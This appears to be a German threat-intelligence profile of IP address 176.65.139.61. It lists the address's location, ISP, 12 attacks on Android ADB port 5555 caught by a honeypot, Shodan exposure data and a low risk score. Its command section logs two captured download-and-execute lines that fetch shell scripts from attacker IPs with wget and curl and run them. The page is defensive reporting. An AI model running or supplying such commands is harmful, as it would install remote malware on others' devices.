TROYANOSYVIRUS
Aktive BedrohungNIEDRIG

176.65.139.61

Herkunftsland🇱🇺 LU
Erste Erkennung1.5.2026
Letzte Aktivitat3.5.2026
ISPOffshore LC
🎯
12
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
0
Malware

Geolokalisierung

Land
🇱🇺 LU
Stadt
Unbekannt
ASN
AS214472
ISP
Offshore LC

Angriffsarten

adb_honeypot

Angegriffene Ports

5555

Zugehorige Malware

Keine zugehorige Malware

Ausgefuhrte Befehle

$cd /data/local/tmp/; busybox wget http://176.65.139.61/bb.sh; sh bb.sh; curl http://176.65.139.61/bb.sh; sh bb.sh3x
$cd /data/local/tmp/; busybox wget http://31.211.189.87/adbbb.sh; sh adbbb.sh; curl http://31.211.189.87/adbcc.sh; sh adbcc.sh1x

Shodan InternetDB ExpositionShodan

InternetDB-Daten, nicht in Echtzeit

Ports
22
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linux

Risikobewertung

20
/100
NiedrigMittelHochKritisch